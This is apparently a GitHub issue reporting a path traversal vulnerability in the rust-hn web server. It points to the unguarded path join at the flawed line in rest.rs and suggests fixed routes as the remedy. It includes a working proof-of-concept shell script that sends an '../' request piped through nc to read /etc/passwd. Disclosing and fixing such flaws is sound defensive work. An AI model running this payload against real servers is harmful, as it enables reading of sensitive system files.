Path traversal vulnerability

[guidovranken]

s.sh:

echo -en "GET /assets/../../../../../../../etc/passwd HTTP/1.1\x0d\x0a"
echo -en "Host: localhost:8888\x0d\x0a"
echo -en "Accept: */*\x0d\x0a"
echo -en "\x0d\x0a"
echo -en "\x0d\x0a"

Then:

bash s.sh | nc localhost 8888

This makes rust-hn send the password file because the path concatenation doesn't guard against this:

rust-hn/src/server/rest.rs

Line 419 in 59821f2

let content: Vec<u8> = match std::fs::read(Path::new("assets").join(path)) {

Thank you for your work.

[guidovranken]

Most other languages have a canonical solution for safe path concatenation, I'm not sure if Rust does. If it doesn't, whitelisting or creating separate routes for the 5 files in assets/ would be good, otherwise reject all filenames with characters not in [a-zA-Z0-9.].

[guidovranken]

Personally I went with this:

        .route(
            "/favicon.ico",
            get(|| async move { serve_file("favicon.ico").unwrap() }),
        )
        .route(
            "/assets/logo.svg",
            get(|| async move { serve_file("logo.svg").unwrap() }),
        )
        .route(
            "/assets/script.js",
            get(|| async move { serve_file("script.js").unwrap() }),
        )
        .route(
            "/assets/style.css",
            get(|| async move { serve_file("style.css").unwrap() }),
        )
        .route(
            "/assets/triangle.svg",
            get(|| async move { serve_file("triangle.svg").unwrap() }),
        )